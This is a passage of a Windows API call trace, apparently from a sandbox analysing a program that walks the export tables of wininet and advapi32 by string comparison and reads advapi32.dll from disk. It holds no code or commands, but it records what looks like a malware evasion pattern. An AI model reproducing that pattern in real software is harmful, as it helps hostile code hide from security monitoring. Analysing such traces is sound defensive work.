[0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0149.879] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.879] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0149.880] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0149.880] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0149.881] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0149.881] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0149.882] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0149.883] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0149.884] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0149.884] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0149.884] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0149.884] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0149.884] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0149.884] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0149.884] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0149.885] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0149.886] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0149.886] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0150.042] GetProcessHeap () returned 0x4d0000 [0150.042] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4002040 | out: hHeap=0x4d0000) returned 1 [0150.055] GetProcessHeap () returned 0x4d0000 [0150.055] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e9250 [0150.058] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0150.058] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0150.058] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0150.058] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0150.058] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0150.059] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0150.059] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0150.059] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0150.059] GetProcessHeap () returned 0x4d0000 [0150.059] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0xa3ef0) returned 0x2c42010 [0150.061] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0150.061] ReadFile (in: hFile=0x140, lpBuffer=0x2c42010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c42010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0150.075] CloseHandle (hObject=0x140) returned 1 [0150.076] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0150.076] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0150.076] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0150.076] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0150.076] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0150.076] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0150.076] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0150.076] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0150.076] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0150.076] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0150.076] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0150.076] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0150.076] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0150.076] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0150.076] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0150.076] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0150.077] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0150.077] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0150.077] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0150.077] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0150.077] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0150.077] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0150.199] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0150.199] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0150.199] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", 